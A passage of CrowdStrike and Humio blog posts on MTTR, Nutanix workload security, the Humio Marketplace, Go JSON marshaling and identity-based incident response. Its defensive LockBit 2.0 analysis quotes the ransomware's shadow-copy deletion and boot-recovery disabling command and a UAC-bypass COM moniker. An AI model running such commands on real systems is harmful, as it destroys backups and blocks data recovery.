Conversely, tracking the MTTF of systems with more typical lifespans is a good way to gain insight into which brands perform best or which environmental factors most strongly influence a product’s durability.

MTTR is intended to reduce unplanned downtime and shorten breakout time, but its use also supports a better culture within ITOps teams. When incidents are repaired before users are impacted, DevOps and ITOps are seen as efficient and effective. Measuring MTTR also encourages resilient system design: when DevOps knows its performance will be measured by MTTR, the team will build apps that can be repaired faster, such as apps composed of discrete web services so that one failed service will not crash the entire app. MTTR, when done properly, includes post-incident analysis, which should feed a loop that leads to better software builds in the future and encourages the fixing of bugs early in the SDLC.

How to Calculate Mean Time to Repair

The MTTR formula is straightforward: Simply add up the total unplanned repair time spent on a system within a certain time frame and divide the results by the total number of relevant incidents.

For example, if you have a system that fails four times in one workday and you spend a total of one hour repairing those failures, your MTTR would be 15 minutes (60 minutes / 4 = 15 minutes).

However, not all outages are equal. The time spent repairing a failed component or a customer-facing system that goes down during peak hours is more expensive in terms of lost sales, productivity or brand damage than time spent repairing a non-critical outage in the middle of the night. Organizations can establish an “error budget” that specifies, for example, that each minute spent repairing the most impactful systems counts as much as sixty minutes spent repairing less impactful ones. This level of granularity will help expose the true costs of downtime and provide a better understanding of what MTTR means to the particular organization.

How to Reduce MTTR

There are three elements to reducing MTTR:

  1. Manage resolution process. The first is a defined strategy for managing the resolution process, which should include a post-incident analysis to capture lessons learned.
  2. Build defenses. Technology plays a crucial role, of course, and the best solution will provide visibility, monitoring and corrective maintenance to help root out problems and build defenses against future attacks.
  3. Mitigate the incident. Lastly, the skills necessary to mitigate the incident have to be available.

MTTR can be reduced by increasing budget or headcount, but that isn’t always realistic. Instead, deploy artificial intelligence (AI) and machine learning (ML) to automate as much of the repair process as possible. Those steps include rapid detection, minimization of false positives, smart escalation, and automated remediation that includes workflows that reduce MTTR.

MTTR can be a helpful metric to reduce downtime and streamline your DevOps and ITOps teams, but improving it shouldn’t be the end goal. After all, the point of using metrics is not simply improving numbers but, in this instance, the practical matter of keeping systems running and protecting the business and its customers. Use MTTR in a way that helps your teams protect customers and optimize system uptime.

Improve MTTR With a Modern Log Management Solution

Logs are invaluable for any kind of incident response. Humio’s platform enables complete observability for all streaming logs and event data to help IT organizations better prepare for the unknown and quickly find the root cause of any incident.

Humio leverages modern technologies, including data streaming, index-free architecture and hybrid deployments, to optimize compute resources and minimize storage costs. Because of this, Humio can collect structured and unstructured data in memory to make exploring and investigating data of any size blazing fast.

Humio Community Edition

With a modern log management platform, you can monitor and improve your MTTR. Try it out at no cost!

✇ CrowdStrike

Securing the Application Lifecycle with Scale and Speed: Achieving Holistic Workload Security with CrowdStrike and Nutanix

By: Fiona Ing

With virtualization in the data center and further adoption of cloud infrastructure, it’s no wonder that IT, DevOps and security teams grapple with new and evolving security challenges. An increase in virtualized applications and desktops has caused organizations’ attack surfaces to expand quickly, enabling highly sophisticated attackers to take advantage of the minimal visibility and control these teams hold.

The question remains: How can your organization secure your production environments and cloud workloads to ensure that you can build and run apps at speed and with confidence? The answer: CrowdStrike Falcon® on the Nutanix Cloud Platform.

Delivered through CrowdStrike’s single lightweight Falcon agent, your team is enabled to take an adversary-focused approach when securing your Nutanix cloud workloads — all without impacting performance. With scalable and holistic security, your team can achieve comprehensive workload protection and visibility across virtual environments to meet compliance requirements and prevent breaches effectively and efficiently. 

Secure All of Your Cloud Workloads with CrowdStrike and Nutanix

By extending CrowdStrike’s world-class security capabilities into the Nutanix Cloud Platform, you can prevent attacks on virtualized workloads and endpoints on or off the network. The Nutanix-validated, cloud-native Falcon sensor enhances Nutanix’s native security posture for workloads running on Nutanix AHV without compromising your team’s output. By extending CrowdStrike protection to Nutanix deployments, including virtual machines and virtual desktop infrastructure (VDI), you get scalable and comprehensive workload and container breach protection to streamline operations and optimize performance.

CrowdStrike and Nutanix provide your DevOps and Security teams with layered security, so they can build, run and secure applications with confidence at every stage of the application lifecycle. Easily deploy and use the CrowdStrike Falcon sensor without hassle for your Nutanix AHV workloads and environment. 

CrowdStrike’s intelligent cloud-native Falcon agent is powered by the proprietary CrowdStrike Threat Graph®, which captures trillions of high-fidelity signals per day in real time from across the globe, fueling one of the world’s most advanced data platforms for security. The Falcon platform helps you gain real-time protection and visibility across your enterprise, preventing attacks on workloads on and off the network. 

Get Started and Secure Your Linux Workloads in the Cloud

With Nutanix and CrowdStrike, you can feel confident that your Linux workloads are secure on creation by using CrowdStrike’s Nutanix Terraform script built on Nutanix’s Terraform Provider. By deploying the CrowdStrike Falcon sensor during Linux instance creation, the lifecycle of building and securing workloads before they are operational in the cloud is made simple and secure, without operational friction. 

Get started with CrowdStrike and Nutanix by deploying Linux workloads securely with CrowdStrike’s Nutanix Terraform script.

Gain Holistic Security Coverage Without Compromising Performance

With CrowdStrike and Nutanix, you can seamlessly secure your end-to-end production environment, streamline operations and optimize application performance; easily manage storage and virtualization securely with CrowdStrike’s lightweight Falcon agent on the Nutanix Cloud Platform; and secure your Linux workloads with CrowdStrike’s Nutanix Terraform solution. Building, running and securing applications on the Nutanix Cloud Platform takes the burden of managing and securing your production environment off your team and ensures confidence.


✇ CrowdStrike

Introduction to the Humio Marketplace

By: Humio Staff

This blog was originally published Oct. 11, 2021 on humio.com. Humio is a CrowdStrike Company.

Humio is a powerful and super flexible platform that allows customers to log everything and answer anything. Users can choose how to ingest their data and choose how to create and manage their data with Humio. The goal of Humio’s marketplace is to provide a variety of packages that power our customers with faster and more convenient ways to get more from their data across a variety of use cases.

What is the Humio Marketplace?

The Humio Marketplace is a collection of prebuilt packages created by Humio, partners and customers that Humio customers can access within the Humio product interface.

These packages are relevant to popular log sources and typically contain a parser and some dashboards and/or saved queries. The package documentation includes advice and guidance on how to best ingest the data into Humio to start getting immediate value from logs.

What is a package?

The Marketplace contains prebuilt packages that are essentially YAML files that describe the Humio assets included in the package. A package can include any or all of: a parser, saved searches, alerts, dashboards, lookup files and labels. The package also includes YAML files for the metadata of the package (such as descriptions and tags, support status and author), and a README file which contains a full description and explanation of any prerequisites, etc.

Packages can be configured as either a Library type package — which means, once installed, the assets are available as templates to build from — or an Application package, which means, once installed, the assets are instantiated and are live immediately.

By creating prebuilt content that is quick and simple to install, we want to make it easier for customers to onboard new log sources to Humio to quickly get value from that data. With this prebuilt content, customers won’t have to work out the best way of ingesting the logs and won’t have to create parsers and dashboards from scratch.

How do I make a package?

Packages are a great way to reduce manual work, whether by taking advantage of prebuilt packages or by creating your own so you don’t have to rebuild the same assets from scratch.

Anyone can create a Humio package straight from Humio’s interface. We actively encourage customers and partners to create packages and submit those packages for inclusion in the Marketplace if they think they could benefit other customers. Humio will work with package creators to make sure the package meets our standards for inclusion in the Marketplace. By sharing your package with all Humio customers through the Marketplace, you are strengthening the community and allowing others to benefit from your expertise while you, likewise, benefit from others’ expertise.

For some customers, the package will be exactly what they want, but for others, it will be a useful starting point for further customization. All Humio packages are provided under an Apache 2.0 license, so customers are free to adapt and reuse the package as needed.

If I install a package, will it get updated?

Package creators can develop updates in response to changes in log formats or to introduce new functionality and improvements. Updates will be advertised as available in the Marketplace and users can choose to accept the update. The update process will check to see if any local changes have been made to assets installed from the package and, if so, will prompt the user to either overwrite the changes with the standard version from the updated package or to keep the local changes.

Are packages free?

Yes, all Humio packages in the Marketplace are free to use!

Can I use packages to manage my own private Humio content?

Absolutely! Packages are a convenient way for customers to manage their own private Humio content. Packages can be created in the Humio product interface and can be downloaded as a ZIP file and uploaded into a different Humio repository or a different instance of Humio (cloud or hybrid). Customers can also store their Humio packages in a code repository and use their CI/CD tools and the Humio API to deploy and manage Humio assets as they would their own code. This streamlines Humio support and operations and delivers a truly agile approach to log management.

Get started today

Getting started with packages is simple. All you need is access to a Humio Cloud service or, if running Humio self-hosted, to be on V1.21 or later. To create and install packages, you need the “Change Packages” permission assigned to your Humio user role.

Access the Marketplace from within the Humio product UI (Go to Settings, Packages, then Marketplace to browse the available packages or to create your own package). Try creating a package and uploading it to a different repository. If you create a nice complex dashboard and want to recreate it in a different repository, you know what to do: Create a package; export/import it, and then you don’t need to spend time recreating it!

Let us know what else you want to see in the Marketplace by connecting with us at The Nest or emailing [email protected].


✇ CrowdStrike

Ransomware (R)evolution Plagues Organizations, But CrowdStrike Protection Never Wavers

By: Thomas Moses - Sarang Sonawane - Liviu Arsene
  • ECrime activities dominate the threat landscape, with ransomware as the main driver
  • Ransomware operators constantly refine their code and the efficacy of their operations
  • CrowdStrike uses improved behavior-based detections to prevent ransomware from tampering with Volume Shadow Copies
  • Volume Shadow Copy Service (VSS) backup protection nullifies attackers’ deletion attempts, retaining snapshots in a recoverable state

Ransomware is dominating the eCrime landscape and is a significant concern for organizations, as it can cause major disruptions. ECrime accounted for over 75% of interactive intrusion activity from July 2020 to June 2021, according to the recent CrowdStrike 2021 Threat Hunting Report. The continually evolving big game hunting (BGH) business model has seen widespread adoption, with access brokers facilitating entry and dedicated leak sites applying pressure for victim compliance. Ransomware continues to evolve, with threat actors implementing components and features that make it more difficult for victims to recover their data. 

Lockbit 2.0 Going for the Popularity Vote

The LockBit ransomware family has constantly been adding new capabilities, including tampering with Microsoft Server Volume Shadow Copy Service (VSS) by interacting with the legitimate vssadmin.exe Windows tool. Capabilities such as lateral movement or destruction of shadow copies are some of the most effective and pervasive tactics ransomware uses.

Figure 1. LockBit 2.0 ransom note (Click to enlarge)

The LockBit 2.0 ransomware has similar capabilities to other ransomware families, including the ability to bypass UAC (User Account Control), self-terminate or check the victim’s system language before encryption to ensure that it’s not in a Russian-speaking country. 

For example, LockBit 2.0 checks the default language of the system and the current user by using the Windows API calls GetSystemDefaultUILanguage and GetUserDefaultUILanguage. If the language code identifier matches the one specified, the program will exit. Figure 2 shows how the language validation is performed (function call 49B1C0).

Figure 2. LockBit 2.0 performing system language validation

LockBit can even perform a silent UAC bypass without triggering any alerts or the UAC popup, enabling it to encrypt silently. It begins by checking if it’s running under Admin privileges. It does that by using specific API functions to get the process token (NTOpenProcessToken), create a SID identifier to check the permission level (CreateWellKnownSid), and then check whether the current process has sufficient admin privileges (CheckTokenMembership and ZwQueryInformationToken functions).

Figure 3. Group SID permissions for running process

If the process is not running under Admin, it will attempt to elevate by initializing a COM object with elevation of the COM interface, using the elevation moniker COM initialization method with guid: Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}. A similar elevation trick has been used by the DarkSide and REvil ransomware families in the past.

LockBit 2.0 also has lateral movement capabilities and can scan for other hosts to spread to other network machines. For example, it calls the GetLogicalDrives function to retrieve a bitmask of currently available drives to list all available drives on the system. If the found drive is a network share, it tries to identify the name of the resource and connect to it using API functions, such as WNetGetConnectionW, PathRemoveBackslashW, OpenThreadToken and DuplicateToken.

In essence, it’s no longer about targeting and compromising individual machines but entire networks. REvil and LockBit are just some of the recent ransomware families that feature this capability, while others such as Ryuk and WastedLocker share the same functionality. The CrowdStrike Falcon OverWatch™ team found that in 36% of intrusions, adversaries can move laterally to additional hosts in less than 30 minutes, according to the CrowdStrike 2021 Threat Hunting Report.

Another interesting feature of LockBit 2.0 is that it prints out the ransom note message on all connected printers found in the network, adding public shaming to its encryption and data exfiltration capabilities.

VSS Tampering: An Established Ransomware Tactic

The tampering and deletion of VSS shadow copies is a common tactic to prevent data recovery. Adversaries will often abuse legitimate Microsoft administrator tools to disable and remove VSS shadow copies. Common tools include Windows Management Instrumentation (WMI), BCDEdit (a command-line tool for managing Boot Configuration Data) and vssadmin.exe. LockBit 2.0 utilizes the following WMI command line for deleting shadow copies:

C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

The use of preinstalled operating system tools, such as WMI, is not new. Still, adversaries have started abusing them as part of the initial access tactic to perform tasks without requiring a malicious executable file to be run or written to the disk on the compromised system. Adversaries have moved beyond malware by using increasingly sophisticated and stealthy techniques tailor-made to evade autonomous detections, as revealed by CrowdStrike Threat Graph®, which showed that 68% of detections indexed in April-June 2021 were malware-free.

VSS Protection with CrowdStrike

CrowdStrike Falcon takes a layered approach to detecting and preventing ransomware by using behavior-based indicators of attack (IOAs) and advanced machine learning, among other capabilities. We are committed to continually improving the efficacy of our technologies against known and unknown threats and adversaries. 

CrowdStrike’s enhanced IOA detections accurately distinguish malicious behavior from benign, resulting in high-confidence detections. This is especially important when ransomware shares similar capabilities with legitimate software, like backup solutions. Both can enumerate directories and write files that on the surface may seem inconsequential, but when correlated with other indicators on the endpoint, can identify a legitimate attack. Correlating seemingly ordinary behaviors allows us to identify opportunities for coverage across a wide range of malware families. For example, a single IOA can provide coverage for multiple families and previously unseen ones.

CrowdStrike’s recent innovation involves protecting shadow copies from being tampered with, adding another protection layer to mitigate ransomware attacks. Protecting shadow copies helps potentially compromised systems restore encrypted data with much less time and effort. Ultimately, this helps reduce operational costs associated with person-hours spent spinning up encrypted systems post-compromise.

The Falcon platform can prevent suspicious processes from tampering with shadow copies and performing actions such as changing file size to render the backup useless. For instance, should a LockBit 2.0 ransomware infection occur and attempt to use the legitimate Microsoft administrator tool (vssadmin.exe) to manipulate shadow copies, Falcon immediately detects this behavior and prevents the ransomware from deleting or tampering with them, as shown in Figure 4.

Figure 4. Falcon detects and blocks vssadmin.exe manipulation by LockBit 2.0 ransomware (Click to enlarge)

In essence, while a ransomware infection might be able to encrypt files on a compromised endpoint, Falcon can prevent ransomware from tampering with shadow copies and potentially expedite data recovery for your organization.

Figure 5. Falcon alert on detected and blocked ransomware activity for deleting VSS shadow copies (Click to enlarge)

Shown below is LockBit 2.0 executing on a system without Falcon protections. Here, vssadmin is used to list the shadow copies. Notice the shadow copy has been deleted after execution.

Below is the same LockBit 2.0 execution, now with Falcon and VSS protection enabled. The shadow copy is not deleted even though the ransomware has run successfully. Please note, we specifically allowed the ransomware to run during this demonstration.

CrowdStrike prevents the destruction and tampering of shadow copies with volume shadow service backup protection, retaining the snapshots in a recoverable state regardless of whether threat actors use traditional or novel techniques. This allows for instant recovery of live systems post-attack through direct snapshot tools or system recovery.

VSS shadow copy protection is just one of the new improvements added to CrowdStrike’s layered approach. We remain committed to our mission to stop breaches, and constantly improving our machine learning and behavior-based detection and protection technologies enables the Falcon platform to identify and protect against tactics, techniques and procedures associated with sophisticated adversaries and threats.

CrowdStrike’s Layered Approach Provides Best-in-Class Protection

The Falcon platform unifies intelligence, technology and expertise to successfully detect and protect against ransomware. Artificial intelligence (AI)-powered machine learning and behavioral IOAs, fueled by a massive data set of trillions of events per week and threat actor intelligence, can identify and block ransomware. Coupled with expert threat hunters that proactively see and stop even the stealthiest of attacks, the Falcon platform uses a layered approach to protect the things that matter most to your organization from ransomware and other threats.

CrowdStrike Falcon endpoint protection packages unify the comprehensive technologies, intelligence and expertise needed to successfully stop breaches. For fully managed detection and response (MDR), Falcon Complete™ seasoned security professionals deliver 403% ROI and 100% confidence.

Indicators of Compromise (IOCs)

File SHA256
LockBit 2.0 0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049


✇ CrowdStrike

Unexpected Adventures in JSON Marshaling

By: Dylan Bourque

Recently, one of our engineering teams encountered what seemed like a fairly straightforward issue: When they attempted to store UUID values to a database, it produced an error claiming that the value was invalid. With a few tweaks to one of our internal libraries, our team was able to resolve the issue. Or did they?

Fast forward one month, and a different team noticed a peculiar problem. After deploying a new release, their service began logging strange errors alerting the team that the UUID values from the redrive queue could not be read.

So what went wrong? What we soon realized is that when we added a new behavior to our UUID library to solve our first problem, we inadvertently created a new one. In this blog post, we explore how adding seemingly benign new methods can actually be a breaking change, especially when working with JSON support in Go. We’ll walk through what we did wrong and how we were able to dig our way out of it. We’ll also outline some best practices for managing this type of change, along with some thoughts on how to avoid breaking things in the first place.

When Closing a Functional Gap Turns Into a Bug

This all started when one of our engineering teams added a new PostgreSQL database and ran into issues. They were attempting to store UUID values in a JSONB column in the PostgreSQL database using our internal csuuid library, which wraps a UUID value and adds some additional functionality specific to our systems. Strangely, the generated SQL being sent to the database always contained an empty string for that column, which is an invalid value.

INSERT INTO table (id, uuid_val) VALUES (42, '');

ERROR: invalid input syntax for type json

Checking the code, we saw that there was no specific logic for supporting database persistence.  Conveniently, the Go standard library already provides the scaffolding for making types compatible with database drivers in the form of the database/sql.Scanner and database/sql/driver.Valuer interfaces. The former is used when reading data from a database driver and the latter for writing values to the driver. Each interface is a single method and, since a csuuid.UUID wraps a github.com/gofrs/uuid.UUID value that already provides the correct implementations, extending the code was straightforward.
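As a sketch of that delegation (the csuuid field layout is an assumption here, and a stdlib-only stand-in plays the role of github.com/gofrs/uuid.UUID), the wrapper's Scan and Value methods need only forward to the inner value:

```go
package main

import (
	"database/sql/driver"
	"encoding/hex"
	"fmt"
	"strings"
)

// innerUUID stands in for github.com/gofrs/uuid.UUID, which already
// implements sql.Scanner and driver.Valuer.
type innerUUID [16]byte

func (u innerUUID) String() string {
	s := hex.EncodeToString(u[:])
	return s[:8] + "-" + s[8:12] + "-" + s[12:16] + "-" + s[16:20] + "-" + s[20:]
}

// Value implements database/sql/driver.Valuer: the UUID travels to the
// driver in its canonical string form.
func (u innerUUID) Value() (driver.Value, error) { return u.String(), nil }

// Scan implements database/sql.Scanner: accept the string form back.
func (u *innerUUID) Scan(src interface{}) error {
	s, ok := src.(string)
	if !ok {
		return fmt.Errorf("unsupported type %T", src)
	}
	b, err := hex.DecodeString(strings.ReplaceAll(s, "-", ""))
	if err != nil || len(b) != 16 {
		return fmt.Errorf("invalid UUID %q", s)
	}
	copy(u[:], b)
	return nil
}

// UUID mirrors csuuid.UUID (field layout assumed): a thin wrapper whose
// Scan and Value simply delegate to the inner value.
type UUID struct{ id *innerUUID }

func (u *UUID) Scan(src interface{}) error {
	var inner innerUUID
	if err := inner.Scan(src); err != nil {
		return err
	}
	u.id = &inner
	return nil
}

func (u UUID) Value() (driver.Value, error) {
	if u.id == nil {
		return nil, nil // NULL for an empty wrapper
	}
	return u.id.Value()
}

func main() {
	var u UUID
	if err := u.Scan("00010203-0405-0607-0809-0a0b0c0d0e0f"); err != nil {
		panic(err)
	}
	v, _ := u.Value()
	fmt.Println(v) // prints the canonical string back
}
```

Note that the nil check in Value maps an empty wrapper to SQL NULL rather than the invalid empty string that started this investigation.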

With this change, the team was now able to successfully store and retrieve csuuid.UUID values in the database.

Free Wins

As often happens, the temptation of “As long as we’re updating things …” crept in. We noticed that csuuid.UUID also did not include any explicit support for JSON marshaling. Like with the database driver support, the underlying github.com/gofrs/uuid.UUID type already provided the necessary functionality, so extending csuuid.UUID for this feature felt like a free win.

If a type can be represented as a string in a JSON document, then you can satisfy the encoding.TextMarshaler and encoding.TextUnmarshaler interfaces to convert your Go struct to/from a JSON string, rather than satisfying the potentially more complex Marshaler and Unmarshaler interfaces from the encoding/json package.

The excerpt from the documentation for the Go standard library’s json.Marshal() function below (emphasis mine) calls out this behavior:

Marshal traverses the value v recursively. If an encountered value implements the Marshaler interface and is not a nil pointer, Marshal calls its MarshalJSON method to produce JSON. If no MarshalJSON method is present but the value implements encoding.TextMarshaler instead, Marshal calls its MarshalText method and encodes the result as a JSON string. The nil pointer exception is not strictly necessary but mimics a similar, necessary exception in the behavior of UnmarshalJSON.

A UUID is a 128-bit value that is easily represented as a string of 32 hexadecimal digits (conventionally grouped with hyphens); that string format is the typical way UUIDs are stored in JSON. Armed with this knowledge, extending csuuid.UUID to “correctly” support converting to/from JSON was another simple bit of code.

Other than a bit of logic to account for the pointer field within csuuid.UUID, these two new methods only had to delegate things to the inner github.com/gofrs/uuid.UUID value.

At this point, we felt like we had solved the original issue and gotten a clear bonus win. We danced a little jig and moved on to the next set of problems.

Celebrations all around!

A Trap Awaits

Unfortunately, all was not well in JSON Land. Several months after applying these changes, we deployed a new release of another of our services and started seeing logged errors indicating that it could not read in values from its AWS Simple Queue Service (SQS) queue. For system stability, we always do canary deployments of new services before rolling out changes to the entire fleet. The new error logs started when the canary for this service was deployed.

Below are examples of the log messages:

From the new instances:
[ERROR] ..../sqs_client.go:42 - error unmarshaling Message from SQS: json: cannot unmarshal object into Go struct field event.trace_id of type *csuuid.UUID error='json: cannot unmarshal object into Go struct field event.trace_id of type *csuuid.UUID'

From both old and new instances:
[ERROR] ..../sqs_client.go:1138 - error unmarshaling Message from SQS: json: cannot unmarshal string into Go struct field event.trace_id of type csuuid.UUID error='json: cannot unmarshal string into Go struct field event.trace_id of type csuuid.UUID'

After some investigation, we were able to determine that the error was happening because we had inadvertently introduced an incompatibility in the JSON marshaling logic for csuuid.UUID. When one of the old instances wrote a message to the SQS queue and one of the new ones processed it, or vice versa, the code would fail to read in the JSON data, thus logging one of the above messages.

json.Marshal() and json.Unmarshal() Work, Even If by Accident

The hint that unlocked the mystery was noticing the slight difference in the two log messages. Some showed “cannot unmarshal object into Go struct field” and the others showed “cannot unmarshal string into Go struct field.” This difference triggered a memory of that “free win” we celebrated earlier.

The root cause of the bug was that, in prior versions of the csuuid module, the csuuid.UUID type contained only unexported fields, and it had no explicit support for converting to/from JSON. In this case, the fallback behavior of json.Marshal() is to output an empty JSON object, {}. Conversely, in the old code, json.Unmarshal() was able to use reflection to convert that same {} into an empty csuuid.UUID value.

The below example Go program displays this behavior:

With the new code, we were trying to read that empty JSON object {} (which was produced by the old code on another node) as a string containing the hex digits of a UUID. This was because json.Unmarshal() was calling our new UnmarshalText() method and failing, which generated the log messages shown above. Similarly, the new code was producing a string of hex digits where the old code, without the new UnmarshalText() method, expected to get a JSON object.

We encountered a bit of serendipity here, though, because we accidentally discovered that the updated service had been losing those trace ID values called out in the logs for messages that went through the redrive logic. Fortunately, this hidden bug hadn’t caused any actual issues for us.

The snippet below highlights the behavior of the prior versions.

With this bug identified, we were in a quandary. The new code is correct and even fixes the data loss bug illustrated above. However, it was unable to read in JSON data produced by the old code. As a result, it was dropping those events from the service’s SQS queue, which was not acceptable. Additionally, this same issue could exist in many other services.

A Way Out Presents Itself

Since a Big Bang, deploy-everything-at-once-and-lose-data solution wasn’t tenable, we needed to find a way for csuuid.UUID to support both the existing, invalid JSON data and the new, correct format.

Going back to the documentation for JSON marshaling, UnmarshalText() is only the second option for converting from JSON: if a type also satisfies encoding/json.Unmarshaler by providing UnmarshalJSON([]byte) error, then json.Unmarshal() will call that method instead, passing in the raw bytes of the JSON data. By implementing that method and using a json.Decoder to process the raw bytes of the JSON stream, we were able to accomplish what we needed.

The core of the solution relied on taking advantage of the previously unknown bug where the prior versions of csuuid.UUID always generated an empty JSON object when serialized. Using that knowledge, we created a json.Decoder to inspect the contents of the raw bytes before populating the csuuid.UUID value.

With this code in place, we were able to: 

  1. Confirm that the service could successfully queue and process messages across versions 
  2. Ensure any csuuid.UUID values are “correctly” marshaled to JSON as hex strings
  3. Write csuuid.UUID values to a database and read them back

Time to celebrate!

Lessons for the Future

Now that our team has resolved this issue, and all is well once again in JSON Land, let’s review a few lessons that we learned from our adventure:

  1. Normally, adding new methods to a type would not be a breaking change, as no consumers would be affected. Unfortunately, some special methods, like those that are involved in JSON marshaling, can generate breaking behavioral changes despite not breaking the consumer-facing API. This is something we overlooked when we got excited about our “free win.”
  2. Even if you don’t do it yourself, future consumers that you never thought of may decide to write values of your type to JSON. If you don’t consider what that representation should look like, the default behavior of Go’s encoding/json package may well do something that is deterministic but most definitely wrong, as was the case when generating {} as the JSON value for our csuuid.UUID type. Take some time to think about what your type should look like when written to JSON, especially if the type is exported outside of the local module/package.
  3. Don’t forget that the simple, straightforward solutions are not the only ones available. In this scenario, introducing the new MarshalText()/UnmarshalText() methods was the simple, well-documented way to correctly support converting csuuid.UUID values to/from JSON. However, doing the simple thing is what introduced the bug. By switching to the lower-level json.Decoder we were able to extend csuuid.UUID to be backwards compatible with the previous code while also providing the “correct” behavior going forward.

Do you love solving technical challenges and want to embark on exciting engineering adventures? Browse our Engineering job listings and hear from some of the world’s most talented engineers.

✇ CrowdStrike

Credentials, Authentications and Hygiene: Supercharging Incident Response with Falcon Identity Threat Detection

By: Tim Parisi
  • CrowdStrike Incident Response teams leverage Falcon Identity Threat Detection (ITD) for Microsoft Active Directory (AD) and Azure AD account authentication visibility, credential hygiene and multifactor authentication implementation
  • Falcon ITD is integrated into the CrowdStrike Falcon® platform and provides alerts, dashboards and custom templates to identify compromised accounts and areas to reduce the attack surface and implement additional security measures
  • Falcon ITD allows our Incident Response teams to quickly identify malicious activity that would have previously only been visible through retroactive log review and audits, helping organizations eradicate threats faster and more efficiently

Incident responders and internal security teams have historically had limited visibility into Microsoft AD and Azure AD during an investigation, which has made containment and remediation more difficult and reliant on the victim organization to provide historical logs for retrospective analysis and perform manual authentication and hygiene audits. Since CrowdStrike acquired Preempt in 2020, the Services team has leveraged a new module in the Falcon platform, Falcon Identity Threat Detection (ITD), to gain timely and rich visibility throughout incident response investigations related to Active Directory, specifically account authentication visibility, credential hygiene and multifactor authentication implementation. This blog highlights the importance of Falcon ITD in incident response and how our incident response teams use Falcon ITD today.

How Falcon ITD Is Leveraged During Incident Response

It’s no secret that one of CrowdStrike’s key differentiators in delivering high-quality, lower-cost investigations to victim organizations is the Falcon platform. Throughout 2021, we have included Falcon ITD in the arsenal of Falcon modules when performing incident response. This new module provides both clients and responders with the following critical data points during a response:

  • Suspicious logins/authentication activity
  • Failed login activity, including password spraying and brute force attempts
  • Inventory of all identities across the enterprise, including stale accounts, with password hygiene scores
  • Identity store (e.g., Active Directory, LDAP/S) verification and assessment to discover any vulnerabilities across multiple domains
  • Consolidated events around user, device, activity and more for improved visibility and pattern identification
  • Creation of a “Watch List” of specific accounts of interest

In a typical incident response investigation, our teams work with clients to understand the high-level Active Directory topology numbers (e.g., domains, accounts, endpoints and domain controllers). Once the domain controllers are identified, the Falcon ITD sensor is installed to begin baselining and assessing accounts, privileges, authentications and AD hygiene, which typically completes within 5 to 24 hours. Once complete, Falcon ITD telemetry and results are displayed in the Falcon platform for our responders and clients to analyze.

Figure 1 shows the Falcon ITD Overview dashboard, which features attack surface risk categories and assesses the severity as Low, Medium or High. CrowdStrike responders use this data to understand highly exploitable ways an attacker could escalate privileges, such as non-privileged accounts that have attack paths to privileged accounts, accounts that can be traversed to compromise the privileged accounts’ credentials, or if the current password policies allow accounts with passwords that can be easily cracked.

Figure 1. Overview dashboard in Falcon ITD (Click to enlarge)

Figure 2 shows the main Incidents dashboard. This dashboard highlights suspicious events based on baseline patterns and indicators of authentication activity, and also includes any custom detection patterns the CrowdStrike incident response teams have configured, such as alerting when an account authenticates to a specific system.

Figure 2. Incidents main dashboard in Falcon ITD (Click to enlarge)

CrowdStrike responders leverage this information to understand and confirm findings such as the following scenarios:

  • Credentials were used to perform unusual LDAP activity that fits Service Principal Name (SPN) enumeration patterns 
  • An account entered the wrong two-factor verification code or the identity verification timeout was reached
  • Credentials used are consistent with “pass the hash” (PtH) techniques
  • Unusual LDAP search queries known to be used by the BloodHound reconnaissance tool were performed by an account

In addition to the above built-in policies, CrowdStrike responders, in consultation with clients, may also configure custom rules that will trigger alerts and even enforce controls within Falcon ITD, such as the following:

  • Alert if a specific account or group of accounts authenticates to any system or specific ones
  • Enforce a block for specific accounts from authenticating to any system or specific ones
  • Enforce a block for specific authentication protocols being used 
  • Implement identity verification from a 2FA provider such as Google, Duo or Azure for any account or for a specific one attempting to authenticate via Kerberos, LDAP or NTLM protocols
  • Implement a password reset for any account that has a compromised password

In other cases, responders are looking for additional information on accounts of interest that were observed performing suspicious activity. Typically, incident responders would have to coordinate with the client and have the client’s team provide information about that account (e.g., what group memberships it belongs to, what privileges the account has, and if it is a service or human account). Figure 3 shows how Falcon ITD displays this information and more, including password last change date, password strength and historical account activity. This is another example of how CrowdStrike responders are able to streamline the investigation, allowing our client to focus on getting back to business in a safe and secure manner.

Figure 3. Account information displayed in Falcon ITD (Click to enlarge)

Hygiene and Reconnaissance Case Study

During a recent incident response investigation, CrowdStrike Services identified an eCrime threat actor that maintained intermittent access to the victim’s environment for years. The threat actor leveraged multiple privileged accounts and created a domain administrator account — undetected — to perform reconnaissance, move laterally and gather information from the environment.

CrowdStrike incident responders leveraged Falcon ITD to quickly map out permissions associated with the accounts compromised by the threat actor, and identify password hygiene issues that aided the threat actor. By importing a custom password list into Falcon ITD, incident responders were able to identify accounts that were likely leveraged by the threat actor with the same organizational default or easily guessed password.

Falcon ITD also allowed CrowdStrike’s incident response teams to track the threat actor’s reconnaissance of SMB shares across the victim environment. The threat actor leveraged a legitimate administrative account on a system that did not have Falcon installed. Fortunately, the visibility provided by Falcon ITD still alerted incident responders to this reconnaissance activity, and we coordinated with the client to implement remediations to eradicate the threat actor. 

Multifactor Authentication and Domain Replication Case Study

During another investigation, CrowdStrike incident responders identified a nation-state threat actor that compromised an environment and had remained persistent for multiple years. Given this threat actor’s sophistication and their knowledge of the victim environment’s network, Active Directory structure and privileged credential usage, they needed no malware to achieve their objectives.

In light of the multiyear undetected access, CrowdStrike incident responders leveraged Falcon ITD to aid in limiting the threat actor’s mobility by enforcing MFA validation for two scenarios, vastly reducing unauthorized lateral movement capabilities:

  • Enforce MFA (via Duo) for administrator usage of RDP to servers
  • Enforce MFA (via Duo) for any user to RDP from any server to a workstation

Falcon ITD’s detection capabilities were also paramount in identifying the threat actor’s resurgence in the victim network by alerting defenders to a domain replication attack. This allowed defenders to swiftly identify the source of the replication attack, which emanated from the victim’s VPN pool, and take corrective action on the VPN, impacted accounts and remote resources that were accessed by the threat actor.


Falcon Identity Threat Detection provides CrowdStrike incident response teams with another advantage when performing investigations into eCrime or nation-state attacks by providing increased visibility and control in Active Directory, which had previously been unachievable at speed and scale. 

Additional Resources

✇ CrowdStrike

A Principled Approach to Monitoring Streaming Data Infrastructure at Scale

By: Praveen Yedidi

